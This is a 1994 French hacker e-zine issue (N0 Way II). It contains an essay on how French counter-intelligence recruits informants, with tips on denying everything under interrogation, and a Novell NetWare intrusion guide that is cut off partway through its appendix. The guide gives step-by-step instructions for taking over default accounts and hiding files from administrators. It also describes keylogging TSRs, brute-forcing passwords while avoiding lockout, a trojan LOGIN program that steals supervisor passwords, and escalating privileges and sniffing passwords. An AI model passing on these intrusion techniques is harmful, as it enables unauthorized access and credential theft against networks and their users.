Copy Link
Add to Bookmark
Report
N0 Way Volume I, Numero 2
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.1
27 Juin 1994
\-------------------/
> N0 WAY II <
/-------------------\
Nous revoila avec N0 WAY, plus fort que jamais. L'underground
francais se cristalise et ca fait bien peur à tous ces empaffés comme FT,
la DST, Matra, SAT etc...
Beaucoups de choses bougent et pas seulement en France, par exemple
aux USA avec une totale méfiance vis a vis du CERT par exemple qui s'est
diffusé sur tout le réseau Internet. Les Autorités sont de plus en plus
prises à la dérision et ce n'est pas un mal.
Je suis donc träs heureux de vous présenter le deuxiäme numéro de
N0 WAY. De nouveaux auteurs se sont démenés pour vous présenter des articles
de qualité. C'est dans une ambiance bizarre que continuent les scänes
Américaines, Anglaises etc... En effet, depuis quelques temps on a appris que
de grandes figures de l'underground avaient collaborés avec les Secret
Services et avaient fait tomber encore plus de personnes.
C'est aussi en sachant träs bien qu'ils sont monitorés que des
centaines de hackers & phone phreaks continuent leurs balades nocturnes. En
fait on se rend compte que c'est devenu impossible de se cacher totalement des
agences en trois lettres. Les lignes sont tracées dans tous les pays
développés. Sur les factures des cartes france telecom, il y a màme le numéro
d'appel et le numéro appelé. Les Calling Cards sont toutes monitorées par un
tracer et quelques phreaks francais on subit les foudres de Sprint, AT&T et
France Telecom.
Mais de nouveaux horizons montrent bien que le hacking et le phone
phreaking ne mourront jamais:
La téléphonie cellulaire du GSM commence à àtre analysée et disséquée montrant
des failles assez grosses pour y faire passer un 33 tonnes;
Les hackers de l'Internet dévoilent des failles de conceptions des protocoles
TCP/IP avec le Source Routing (aussi appelé IP Spoofing);
Les hackers en général ont mis au point des techniques encore plus
perfectionnées pour faire du TEMPEST pour un bas prix.
Bref, tout le monde avance, et pas seulement les V & les PTT.
Pour contacter l'équipe de N0 WAY, veuillez écrire uniquement à la boite aux
lettres suivante:
NEURALIEN sur RTC ONE au: +33 1 48 70 10 29 (V23)
+33 1 48 58 46 17 (V23)
+33 1 49 88 76 91 (19200)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disclaimer:
Cette publication électronique peut contenir des informations,
données et articles interdits dans certains pays. Si les
informations de cette publication sont interdites dans un pays,
il est du devoir du lecteur de vérifier qu'il a bien le droit de
posséder et de lire (ahahahaha :-) cette publication. Les auteurs
et éditeurs ne sont en aucun cas responsables d'une mauvaise
utilisation des informations publiées. Pour les attaques en
diffamation et autres conneries bonne pour les censeurs, allez
voir qui vous croyez àtre l'éditeur.... Pour la simple et bonne
raison que de responsable de la publication et d'éditeur il n'y
en a pas!!! Les informations fournies dans cette publication sont
à titre informatifs uniquement. Nous ne vous garantissons rien et
si ca vous plait pas allez lire autre chose! Hahahahahahahahahaha...
Toutefois, la diffusion et la lecture de ce bulletin PRIVE est
restreinte à toutes les personnes dans l'underground informatique.
Ne font pas partie de l'underground informatique tel que je le concoit
les personnes suivantes: Membres d'équipes de sécurité publiques ou
privés, personnes affiliées à des agences gouvernementales,
informateurs quelconques, responsables sécurités et autres empaffés se
croyant supérieur de par leur titre.
Lire ce bulletin en n'étant pas dans l'underground informatique
constitue donc une violation des lois de Copyright et de Propriété
Intellectuelle ainsi qu'un acte de malveillance envers les auteurs et
les rédacteurs car il revient à lire des informations propriétaires.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Apräs áa, c'est pas la DST qui peut nous faire un procäs pour
N0 WAY...
"Quoi? Vous avez lu de la documentation propriétaire et secräte alors que vous
faites partie d'une agence de sécurité????"
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.2
Table des matiäres:
~~~~~~~~~~~~~~~~~~
# Titre Auteur Taille
2.1 : Introduction N0 Way Team 4 Ko
2.2 : Table des matiäres N0 Way Team 1 Ko
2.3 : Echec aux pions NeurAlien 10 Ko
2.4 : The complete Novell Hackers Guide Arscene 40 Ko
2.5 : Telsat 8x50 de Satelcom * NeurAlien 10 Ko
2.6 : Hack'n' phreaking on PBX EasyHacker 35 Ko
2.7 : Cellular Telephone Managing System * NeurAlien 5 Ko
2.8 : VMB's sur Memory Call CrAzY ToNe 14 Ko
2.9 : Unlock the FTH numerical lock * NeurAlien 7 Ko
2.10: International Toll Free Number * NeurAlien 7 Ko
2.11: Telecom Information NeurAlien 8 Ko
2.12: Carte Bancaire VISA D. O'CONNELL 14 Ko
2.13: NUI * NeurAlien 6 Ko
2.14: Comment s'amuser avec un simple telephone NeurAlien 5 Ko
Nota: une étoile (*) apräs le nom de l'article veut dire que cet article a été
fait pour CORE DUMP et ressort pour N0 WAY.
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.3
Echec aux pions
Vous, membres de la communauté galactique, vous avez déja entendu
parler de la toute puissante DST. Cette institution nationale qui sous le
couvert du maintien de l'ordre vous espionne nuit et jour.
En lisant cet article, vous connaitrez comment la pluspart des
informations arrivent aux "grandes oreilles" de l'état. La population de
l'underground informatique est tres concernée par cette institution. Nous,
hackers, phone phreaks et cyberpunks, sommes les aventuriers des nouvelles
technologie. Il n'y a plus beaucoup de mondes inconnus et non maitrisés.
L'informatique est l'un de ceux la. C'est pourquoi la DST cherche a controler
la FORCE que nous sommes.
De nombreux hackers ont été "maitrisés" par la DST et certains d'entre
eux travaillent avec. Leurs méthodes sont efficaces (voir autre article de
N0 WAY II) mais une de leur plus effroyable tactique se joue sur le plan
humain.
I. Un peu d'histoire...
Une personne que je connais se fit un jour arreter. A 6 heure du
matin, il fut réveillé par une petite équipe d'inspecteurs de la DST pour
répondre de certains piratage.
Comment l'avaient il trouvé? Il s'était d'abord juré de ne jamais
réväler son nom ni adresse ni téléphone à quiconque sur le réseau. Puis ayant
fait connaissance avec des personnes qu'il considérait comme ses meilleurs
amis, il échangea son numéro de téléphone avec l'une d'entre elles.
FINI ! La rägle était enfreinte, la magie du réseau était brisée!
Le dernier bastion des contacts anonymes venait de voler en éclat.
Mais, cela voudrait il dire que la DST écoutait toutes les
communications informatiques? Non, pas du tout. Il faut savoir que
la DST a PEU DE MOYENS FINANCIERS. Ils n'ont pas de fric! Par contre,
ils possädent des relations en grande quantité.
La DST par contre a une grande mémoire. Ils peuvent träs bien vous
faire avouer votre "méfait" informatique en menacant de reveler quelque chose
de comprommettant sur vous. (Hehe, faites comme moi: je suis comme je suis
et rien a foutre de mon image! C'est exactement le comportement qui les gene:
le "Rien a battre !"). C'est comme ca que certainnes personnes deviennent
des espions de la DST. La DST leur dit:
On vous couvre si il y a un probläme avec la justice (plaintes etc...)
Vous nous donnez en échange toutes les données qui nous interresse sur telle
personne ou tel ami.
Il est tres facile pour eux de transformer n'importe qui en une taupe.
Ils disent: ca vous facilitera la vie plus tard, on se debrouillera pour que
vous n'ayez jamais d'ennui.
Et telle est la piäce maitresse de leur jeu, LES TAUPES !
Ce sont les taupes qui permettent à la DST d'attraper des pirates. Les
inspecteurs de la DST sont trop cons et pas assez dans le courant pour se
faire passer pour des hackers. Ils _utilisent_ donc d'autres pirates qui se
seront fait tauper. Ils gardent toujours la trace de plusieurs taupes et
des qu'ils ont besoin de l'une d'elle à cause de ses fréquentations, la DST
va rechercher dans sa "grande mémoire" la taupe adéquate.
Là on peut se poser la question:
Si c'est la taupe qui fait tomber un mec qui devient une taupe etc... C'est
toujours la DST qui est perdante car personne ne sera jamais incuple ni mis
hors-service?
C'est vrai, áa pourrait àtre le cas mais ce serait oublier quelque chose:
Les enquätes se divisent en 2 parties:
- enquätes de sécurité (95% des cas)
- enquätes judiciaires (5% des cas)
Les taupes sont TOUJOURS dénichées lors d'enquätes de sécurité, donc si vous
recevez la visite d'une équipe de la DST et qu'ils ne vous font pas faire de
Garde à vue ni de déposition ni ne vous présentent un mandat, il est träs
possible que dans quelques temps (le délai peut àtre de l'ordre du jour ou de
l'année) vous soyez recontacté pour avoir des informations, en vous menacant
de vous balancer dans les mains d'un juge. Généralement, le pion est une
personne qui a peu de valeur pour la DST mais qui peut connaitre des personnes
beaucoup plus interressantes;
Et bien sñr on utilise les taupes lors d'enquätes judiciaires car ce sont les
seules qui doivent impérativement aboutir.
Ainsi la DST dispose dee multiples _pions_ ou taupes dans les différents
milieux tels que celui de l'underground informatique. Ces pions sont
facilement manipulables et fournissent tout le temps des informations de
qualité.
Pour entretenir la relation, la DST peut jouer sur deux tableaux:
- flatter le pion en lui attribuant un poste, ou meme un grade (c'est purement
fictif en fait vu que dans le civil (DST) il n'y a pas de grade).
("flatter le pion" revient à peu pres a lui "lécher le fion"... hahaha :))
désolé, je pouvais pas m'en empächer).
- faire peur au pion en lui rappelant des faits ou en menacant de dévoiler
des "secrets". Pour cela, ils n'hésitent sur rien: sexe, problemes
d'argent, vol, relations incestueuses en esperant que la personne soit assez
honteuse sur ce sujet pour avoir peur de ces révélations.
(La bonne parade est de dire par exemple quand on vous montre des photos
compromettantes avec comme personnage principal un LIT:
"j'en veux 2 de celle ci et 5 de celle la, Bravo pour le tirage,
c'est du beau travail"
hehehe :)) effet garanti !)
Au bout d'un certain temps, un pion peut devenir gànant. Il y a des cas comme
celui là:
Un jour, un pion est venu me voir et m'a dit qu'il était dans la merde.
Au bout d'un bon quart d'heure, il m'a enfin dit qu'il avait été un pion pour
la DST et qu'il avait permi d'inculper un mec qui se servait des Callings
Cards pour appeler des amis de certains Cartels (pas plus la dessus).
Ce pion en avait appris trop selon la DST et était devenu gànant. La solution
qu'ils on trouvé à été de l'inculper AVEC le trafiquant en le menacant de
révéler au trafiquant qu'il avait bossé avec eux. Bref, ca voulait dire des
chaussures en béton pour visiter le fond le la Loire pour le pion en question.
Pas mal non? Le pion a fermé sa gueule et s'en est pris plein la gueule tout
en ayant tout le temps collaboré avec la DST.
Vous comprenez maintenant comment une personne peut àtre arràtée aussi
facilement.
II. Et c'est pas fini...
C'est la màme chose dans l'informatique ou dans toutes les professions
sensibles, la DST place des pions un peu partout et s'en sert des qu'elle en a
besoin. Par exemple, la DST envoie des émissaires comme Jean Luc Delacour
dans beaucoup d'écoles pour faire des conférences sur la sécurité. En fait de
conférences, ce sont de véritables séances de recrutement. Les écoles visées
sont les grandes écoles, les écoles d'ingénieurs, les instituts etc...
Une fois un pion installé dans une entreprise, la DST est sñre de
pouvoir tout savoir sur cette société. Rien de plus difficile à detecter
qu'une personne qui joue double jeu. En effet, juste un coup de téléphone
suffit à une taupe pour informer la DST de telle ou telle chose.
Les pions dans ce cas là sont toujours traitées avec respect
mais ca leur attire en général de gros ennuis quand la DST leur demande de
faire quelque chose contre la société ou ils travaillent.
III. Comment se prémunir de ces morpions?
Eh bien le meilleur moyen de se prémunir contre les morpions est de
ne pas pouvoir en devenir un sois màme. C'est plutìt dégradant de faire ce
genre de boulot et j'ai jamais rencontré quelqu'un ayant fait ca qui soit fier
de lui. Je le comprends totalement car il n'y a pas grand chose de plus
désagréable que de trahir ses amis.
Il ne faut pas se sentir vulnérable sur quelque chose. Leur but
est de vous montrer que vous àtes faibles pour vous transformer en un outil
qui leur sera pratique.
Protégez vos amis, ne devenez pas un pion...
...retrouvez vos amis, cessez d'àtre un pion
Pour cesser d'àtre un pion, ca peut àtre plus facile qu'on ne le pense.
Déja, il faut savoir que le seul truc qui peut vous faire réellement tomber
pour du piratage informatique ou du phreaking est l'aveu. Si vous avez avoué,
RIEN NE SERT D'AIDER LA DST, ils ne renvoient JAMAIS l'ascenseur.
^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^
Si vous n'avez pas avoué et qu'ils ont des cahiers/feuilles/disques/HD
montrant des intrusions ou des codes & mots de passes, ils ne peuvent rien en
faire si vous savez quoi répondre.
Ex:
DST: Ces codes sont écrits de votre main, oui?
Vous: c'est Vrai.
D: Donc vous avez accädé à ces codes?
V: Non, jamais.
D: Vous les avez au moins essayé non?
V: Non, c'était juste marrant de les avoirs, ce qu'il y a apräs ne
m'interresse pas.
D: Vous vous foutez de ma gueule ou quoi?
V: Voyons monsieur l'inspecteur, je n'oserai pas!
D: Mais vous aviez la possibilité de rentrer sur ces machines?
V: Oui.
D: Donc vous venez de dire que les codes sont bons, vous àtes donc rentrés sur
cette machine!!!?!
V: NON.
{ c'est a ce genre question qu'il faut répondre toujours et invariablement NON }
Si vous avouez, ce N'EST PAS GRAVE _TANT_ que vous ne signez pas la déposition,
une fois la déposition signée il n'y a plus rien à faire.
Une déposition non signée ne vaut rien.
Ne vous faites pas duper, NE SIGNEZ JAMAIS RIEN sans bien vérifier que le
document ne vous engage pas sur un aveu!
- - - -
Voila, j'espere que vous saurez tirer les lecons et les
conclusions qui s'imposent de cet article. Noous sommes les alliés du 21äme
siäcle, ne nous laissons pas envahir par les collabos des réseaux ;)
++NeurAlien.
Greetings to: Locksmith, Holz, Arscene, Coaxial Brain, Kom Breaker, Easy
Hacker, Crazy Tone, Barkipper2, Fortan, O'Connell, Spy Hunter, FCS, Gandalf,
Powahh et tous les autres hackers et phones phreakz de France et du monde.
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.4
ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ
…ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕª
∫ The Complete Novell Hackers guide ∫
∫ ∫
∫ --== By ARSCENE ==-- ∫
∫ ∫
∫ For No Way ∫
»ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕº
I) Introduction
~~~~~~~~~~~~~~~
Cet article va vous apprendre comment fonctionne la securité dans
un reseau Novell Netware (L'info devrait etre valable pour tous les
reseaux Novell Netware et meme d'autres reseau (pour les grands
principes) mais les details sont ceux du Novell Netware 3.11 ou
386). Le fil directeur sera un 'How to hack' etape par etape avec
des divergences quand cela s'impose. Il part du niveau
debutant/moyen pour arriver a un niveau ou (j'espere) meme les
gurus Novell y trouverons quelque chose de nouveau. Novell est le
plus grand vendeur de reseau LAN au monde; il parait qu'il y a plus
d'ordinateurs en reseau Novell que sur tout Internet. Vous
trouverez ce type de reseau dans beaucoup de moyennes et grandes
entreprises, dans des colleges/lycées et meme certaines facs.
II) Gaining access
~~~~~~~~~~~~~~~~~~
La premiere chose a faire est de se trouver un compte, n'importe
lequel, sur le reseau. Verifiez tout d'abord que les
gestionnaires du reseau sont installés. Il y en a deux: IPX (La
couche de base) et NETX ( Le API de Novell), mais ils peuvent
avoir des noms un peu differents. Ils sont souvent lancés par
le autoexec.bat ou se trouvent dans un repertoire du genre
'Netware' ou 'reseau' ou un truc comme áa.
Maintenant allez sur le drive reseau (F, G, ...). Vous le
reconnaitrez car le seul repertoire accessible s'appelle LOGIN.
La tapez SLIST. Voici la liste des serveurs disponibles (capturez
cela par un 'SLIST > c:\test.txt'). Le serveur avec [default] à
coté est celui le plus proche de vous par les cables du reseau.
Commenáons par la.
Il faut maintenant se logger. Tapez LOGIN.
III) Trouvez un premier compte
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Notre but est de trouver un compte qui n'a pas de password. Par
default SUPERVISOR et GUEST n'en ont pas (Il est egalement bon de
savoir que ces comptes existent toujours car meme l'admin ne peut
les effaáer). Normalement GUEST doit fonctionner. Si le reseau
est censé etre en libre access (lycée, fac, bibliothéque, ...) il
y aura souvent des BAT dans C:\ qui lancent certaines taches sur
le reseau. Cherchez y des lignes du type LOGIN <server/user_id>.
Essayez aussi des trucs du genre TAPE, BACKUP, SERVER, REMOTE,
CONNECT, NOVELL, etc... Si vous voyez qu'un compte lance un BAT
(c'est souvent le cas des backups) essayez CTRL-C pour le quitter
et vous serez libre.
Si vous n'avez toujours pas de compte il est temps d'utiliser vos
talents de social engineering, preferablement sur des users, pas
l'admin.
IV) L'environnement Netware et les scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A) L'environnement Netware:
La premiäre partie est traduite directement d'un article de The
Butler parut dans Phrack 35 car cette partie de son article
etait träs bien:
Le directory SYS:SYSTEM est utilisé pour l'administration du
systäme et contient les fichiers de l'OS netware et des progs à
l'usage exclusif du supervisor.
Le directory SYS:PUBLIC est ouvert à tous et contient des outils
divers (dont j'en presenterait quelques un plus loin).
Le directory SYS:LOGIN contient, comme son nom l'indique, quelques
progs pour se logger.
Le directory SYS:MAIL est utlisé par des progs de mail ecrits pour
Netware. Ce directory a aussi un sous-dir du nom du ID number pour
chaque utilisateur qui contient son script de login et des configs
pour l'imprimante (Les dirs des users autres que vous ne sont
visibles que pour le supervisor).
B) Les scripts de login
La suite est egalement traduite du meme article de The Butler de
Phrack (La traduction n'est pas telle quelle, je resume souvent):
Le script de login est executé chaque fois que vous vous loggez et
il prepare l'environnement pour vous. Il map des drives/directory
du reseau pour que vous pouvez y acceder, il peut vous logger sur
d'autres serveurs et executer des progs.
Pour editer votre script une fois loggé lancez SYSCON, allez sur
'User Information', sur votre nom, puis sur 'Login Script'. Editez
votre script puis quittez par <Esc> et confirmez. Pour que votre
script s'execute vous devez faire Logout et a nouveau vous logger.
Voici les commandes principales des script, une petite description
(en Anglais, j'en ais mare de traduire) et un example:
MAP INS16:= Inserts the drive as the next available search drive.
MAP INS16:=pd3\sys:jan
MAP drive:= Maps the specified drive to the given directory.
MAP G:=pd3\sys:home\jan
MAP *n:= Maps the next available drive to the given directory.
MAP *1:=pd3\sys:home\jan
# Runs an executable file (a file with an .EXE or .COM
extension).
#SYSCON
REMARK These three commands allow you to insert explanatory text in
* the login script. They will not appear on your screen.
;
REMARK Be sure to update the PROJECTS file.
* Check for new mail.
; Assign OS-dependent Search mappings.
ATTACH Allows you to attach to other file servers while remaining
logged in to your current file server.
ATTACH pd3\jan
SET Allows you to set DOS variables.
SET wp="/u-jlw/"
SET usr="jwilson"
IF...THEN Executes certain commands, if a specified condition exists.
IF DAY_OF_WEEK="Monday" THEN WRITE "AARGH..."
Si quelque chose n'est pas clair essayez differentes maniäres et
consultez le HELP qui est träs explicite sur les scripts.
Pour voir ce que vous avez Mappé tapez: MAP. Vous pouvez egalement
rajouter des map avec cet outil. Examples:
MAP J:= path <Enter>
MAP J:= COUNT/SYS:HOME/MARIA <Enter>
MAP S3:=COUNT/ACCT:ACCREC <Enter>
V) Les utilitaires et tous les autres comptes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vous voici donc sur le reseau. Allez dans le root (disons que
c'est le drive F). Si vous y voyez un directory SYSTEM et 2
fichiers .ERR alors votre compte a le niveau SUPERVISOR.
Congratulez vous d'avoir un admin si stupide. (Normalement votre
access ne sera que träs limité).
Allez dans le repertoire PUBLIC. Je vais vous presenter quelques
utilitaires interressants:
- USERLIST : Donne la liste des utilisateurs actuels du reseau.
Träs utile pour voir si le supervisor est connecté. Le compte avec
un '*' a coté c'est vous. Capturez la sortie: 'USERLIST >
c:\test2.txt'. Voici de nouveaux comptes à essayer.
- RIGHTS : Affiche vos droits dans le directory actuel. Si vous
avez 'S' votre compte est supervisor. 'A' c'est Access control,
aussi assez interressant. 'W' est Write et peut vous permettre de
faire transiter des fichiers a vous par le serveur (Par exemple pour
y acceder a partir d'un ordinateur ou les floppy drives sont
inaccessibles). Utilisez des noms judicieux pour bien dissimuler
vos fichiers: MENU.OLD, ~TFG245.TMP, etc. Si vous trouvez une
suite de fichiers du genre FIC1.EXT, FIC2.EXT, FIC3.EXT, etc alors
appelez les votre FIC4.EXT et ainsi de suite. Le truc est que
l'admin ne les remarque pas. Aussi evitez de changer leur ATTRIB
car cela ne les rendra que plus visibles.
- SEND : Vous permet d'envoyer des messages à un autre connecté.
Syntaxe: SEND "Message bla bla" TO <USER_ID>. Notez que _tous_ les
gens connectés sous le nom <USER_ID> reáoivent vos messages donc
verifiez que votre destinataire est seul. Evitez de trop utiliser
cet outil car il est lourd (il y a des CHAT en free/shareware
beaucoup mieux) et a une facheuse tendance a reveiller l'admin.
Un user peut bloquer/debloquer des messages (empecher qu'on ne lui
envoit des messages) avec CASTOFF/CASTON
- HELP : Comme son nom l'indique. Utilisez le à fond pour bien
connaitre Novell, il est träs bien fait. Vous pouvez egalement
l'emporter chez vous en copiant les fichiers: 'NFOLIO.*' et
'*.NFO'.
- SYSCON : Le meilleur outil de tous. Vous allez etre
amener a träs bien le connaitre. Avant de le lancer executer un
prog du type ScrollIt (shareware) qui permet de capturer l'ecran et
de la sauvegarder dans un fichier. Apräs avoir lanáé SYSCON allez
sur l'option 'User Information' et, abracadabra, voiái la liste de
_tous_ les comptes possibles sur ce serveur. Utilisez maintenant
ScrollIt pour sauvez cette liste dans c:\TEST3.TXT (Si la liste est
plus longue qu'un ecran il faudra vous y prendre a plusieures
fois). Cet outil vous permet de voir le niveau securité du compte
que vous utilisez (allez sur son nom et faites Enter) ainsi que
toutes les restrictions horaires, de stations, de place disque,
etc. C'est egalement cet outil que vous utiliserez une fois loggé
en supervisor (cf plus bas).
- SESSION : Un genre de super USERLIST. Explorez le mais il n'est
pas d'une grande utilité.
- SETPASS : Permet de changer le PW du compte dans lequel vous etes
loggé. Pour l'utiliser il faut connaitre l'ancien PW. Cet outil
sert beaucoup pour tester un hack: Vous changez le PW d'un compte
qui n'a pas de PW en 'abc', et vous essayez votre hack dessus pour
voire s'il le trouve. Si oui alors il devrait fonctionner sur
d'autres comptes, si non votre hack n'est pas bon. Quand vous avez
fini (evitez de prendre trop longtemps en cas ou quelqu'un d'autre
essaye de se logger) vous remetez le PW a rien (tapez <cr> pour
nouveau PW).
VI) Supervisor access
~~~~~~~~~~~~~~~~~~~~~
Il nous faut maintenant trouver le PW du supervisor. Il y a 4
faáons de faire ceci:
A) Par Social Engineering ou en utilisant des competences non liées
à l'informatique. Ceci n'est pas du ressort de cet article.
B) La meilleure faáon: Pour ceci il faut avoir access physique à un
poste ou se log le supervisor. Il faut y installer un TSR qui va
capturer son PW lorsque il se log. Il y a en gros 2 faáons de
faire ceci:
* Détourner la fonction de Int 21h 'load & execute' et verifier si
on essaye d'executer LOGIN. On detourne alors Int 9h (Clavier) et
on capture tout jusqu'à la fin de LOGIN (Int 20h, je pense, qui est
terminaison de programme). Cette technique est employé par un
superbe programme du nom de GETIT ou THIEFNOV que l'on peut trouver
sur certains BBS.
* Détourner la propre interruption de login de l'API Novell. Pour
cela il faut que le TSR soit lanáé _apräs_ NETX. Je pense que avec
des techinques employés par des virus on pourrait infecter NETX
(NETX.COM ne fait pas de check d'integrité) avec le TSR de sorte
que tout se passe de faáon transparente, mais cela reste à etudier.
Pour plus d'infos sur les Int de l'API Novell je recommande Ralph
Browns Interrupt List (freeware). De la on voit que les 2 Int les
plus interressants sont:
- Int 21h, AH=E3h, subfunction 14h (Login to file server)
- Int 21h, AH=F2h, AL=17h, subfunction 18h (Login encrypted)
Le premier est träs bien decrit, mais malheureusement je pense que
ce soit le second le plus utilisé. Pour voir lequel est utilisé
ecrivez un petit prog pour generer l'int, ou vous pouvez essayer
INT.COM qui vient avec la Interrupt List. Si le serveur vous
repond un truc du genre 'Attempt to send unencrypted password over
the network' alors il vous faut le second.
Le probläme ici est que le second Int envoit le PW crypté, ce qui
ne nous est pas träs utile car le chiffrement du PW depend d'une
clé descerné par le serveur. Voyez Appendix C pour une description
de comment Novell crypte les PW. Le code en Appendix B devrait
aussi etre träs utile.
De toute faáon, cela fait que la premiäre approche (rediriger l'Int
du clavier) est nettement meilleure si vos PW sont envoyés cryptés.
C) La plus longue faáon mais aussi la plus sure: Essayer toutes (ou
presque) les combinaisons possibles. Cela se fait en utilisant la
technique du demon dialing (comme dans un wardialer). Vous pouvez
soit essayer toutes les combinaisons possibles (aaa, aab, ...
zzzzzz,etc) ou alors faire un dictionary attack, c'est a dire
essayez tous les mots d'un dictionnaire que vous prevoyez. La
premiäre methode est sure de trouver le PW eventuellement, mais la
seconde est beaucoup plus rapide.
Ensuite, il y a 2 faáons d'essayer les PW:
* En login: Cette maniäre consiste tout simplement a essayer de se
logger avec tous les PW jusqu'a trouver le bon. Il y a un freeware
qui fait cela avec LOGIN.EXE, mais il est träs lent et je ne suit
pas 100% sur qu'il fonctionne, donc je ne le conseille pas. Il
vaut mieux ecrire son propre prog.
Les Int qui nous interressent (encore du Interrupt List) sont ceux
listés en B), et celui à utiliser depands si les PW doivent etre
cryptés ou pas.
Cela semble bien, mais il y a un hic: Intruder Detection/Lockout.
Si l'admin a activé cette option au bout de X echecs au login le
compte sera desactivé jusqu'a ce que l'admin le reset. Donc avant
d'essayer cette methode il vaut mieux tenter un dixaine de login
avec un account, si vous pouvez en essayer beaucoup alors Intruder
Detection/Lockout n'est pas actif. Pour essayer choisissez plustot
un compte assez faible, celui d'une secretaire pas trop doué ou un
compte ou il y a souvent pas mal de personnes loggez en meme temps.
* En verify password: Le principe est le meme mais au lieu
d'essayer de se logger on utilise un int qui nous permet de
verifier si le PW est bon. Cela a un double avantage: Plus rapide
que Login et pas d'Intruder Detection/Lockout.
Les deux Int sont:
- Int 21h AH=E3h sub 3Fh Verify bindery object PW
- Int 21h AH=F2h AL=17h sub 4ah Verify bindery object PW encrypted
Ici encore, c'est a vous de determiner le quel est le bon pour
vous. Si vous pouvez utiliser le premier je vous conseille
l'utilitaire NETCRACK qui essaye tous les PW possible sur un compte
(avant de l'utiliser editez le pour enlever le texte qu'il
affiche). Si vous essayez NETCRACK sur un serveur ou les PW
doivent etre cryptés il marchera quand meme mais il envoit un
message a tous les supervisor loggés, au serveur et à vous meme et
emet un bip. Le message est à peu präs: 'Attempt to send
unencrypted PW over the network'.
D) Le LOGIN trojan. Si un poste se log automatiquement par le
AUTOEXEC.BAT vous pouvez ecrire un trojan LOGIN.COM qui fait:
- Demande le nom si celui si n'a pas été specifié sur la ligne de
commande.
- Demande le PW.
- Genere un ecran d'erreure _identique_ a celui du vrai LOGIN pour
faire croire que le user a mal tapé son PW.
- Sauve le serveur, le nom, le PW, l'heure et la date dans un
fichier local caché.
- Va dans le directory F:\LOGIN (ou selon) ou se trouve le vrai
LOGIN et quitte. Le user va réessayer de se logger. La le vrai
LOGIN s'executera et il ne va s'apercevoir de rien. Une option ici
serait de sauvegarder le AUTOEXEC.BAT a l'installation et quand le
trojan a capturé le PW du SUPERVISOR il s'efface lui-meme et
restaure le AUTOEXEC.BAT d'origine.
Si vous laissez un fichier (LOGIN.COM) sur le disque je vous
recommande vivement de l'editer pour enlever tout le texte qui s'y
trouve et de le crypter avec TINYPROG (shareware) pour eviter que
l'on ne decouvre qui l'a ecrit.
VII) L'apräs SUPERVISOR et les autres comptes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A) Votre compte a vous:
Vous avez le PW du SUPERVISOR. Toutefois evitez de vous servir de
ce compte car l'admin le remarquera. Choisissez un compte qui sert
peu ou qui n'a pas servi depuis longtemps, un compte dont vous
connaissez le PW est le mieux mais un compte sans PW est bon aussi.
Vous allez maintenant donner à ce compte le SUPERVISOR equivalence
(en faire un autre Supervisor):
- Loggez vous sur un compte bidon et verifiez (USERLIST) que
personne de trop important n'est present. Faites Logout.
- Loggez vous en SUPERVISOR et lancez SYSCON
- Ignorez les 'Supervisor utilities' et allez dans 'User
Information'
- Selectionnez le compte que vous avez choisis et faites Enter
- Allez sur 'Security Equivalences' et faites Enter
- Faites <Ins> et selectionnez SUPERVISOR dans la liste et Enter.
- Confirmez si on vous le demande et quittez par des <Esc>
repetitifs.
Voila, bravo, vous avez votre compte Supervisor.
B) Tous les autres PW:
*** Moi, l'auteur, ait verifié que tout ce qui precede est correct
*** et marche. Je n'ais pas encore essayé la suite et ne peut donc
*** pas garantir son efficacité. Je ne tarderait pas bien sur a
*** essayer.
Maintenant vous desirez surement prendre les PW de tous les autres
user. Vous pouvez proceder comme pour le compte SUPERVISOR, mais
il y a des moyens beaucoup plus rapides:
* Tous les PW sont cryptés et sauvegardés dans les Bindery file.
Procurez vous un utilitaire pour Dump la Bindery et emmenez la chez
vous. Vous allez maintenant faire une operation chäre aux
UNIX-hackers: Un autre brute-force attack. L'appendix B contient
un prog C avec l'algo de cryptage qu'utilise Novell. Il vous reste
a faire un dictionnary attack en cryptant vos mots et en les
comparant à ceux du bindery pour chaque user. Cela ne devrait pas
prendre trop longtemps et il n'y a pas de probléme car vous etes
chez vous, ou l'admin ne peut vous voire.
* La deuxiäme tactique est le packet-sniffing. Si votre reseau
utilise des PW cryptés loggez vous au niveau SUPERVISOR (console)
et tapez: Set Allow Unencrypted Passwords=ON Les PW passeront dans
le reseau non-cryptés. Il vous suffit de lancer IPX.COM (Vous
n'avez meme pas besoin d'etre loggé) et un programme qui capture
tous les packets qui passent sur le reseau. De cette maniäre vous
pourrez meme lire le mail, les messages par SEND et tout ce qui
transite pas le reseau. Cette partie doit vous sembler träs floue.
C'est normal car je n'ais put l'essayer pour l'instant.
Appendix A: Notes en vrac et obtenir plus d'infos:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Pour les PW le case n'est pas important: 'X' et 'x' sont pareils.
Les PW peuvent aussi contenir des numeros et ils peuvent faire
jusqu'à 20 charachters.
Dans le root il y a 2 fichiers .ERR (Qui ne nous sont pas d'une
grande utilité):
- VOL$LOG.ERR : Informations sur quand le volume a été monté et
démonté et les erreures qui se sont produites.
- TTS$LOG.ERR : Indique quand le Transaction Tracking Service a
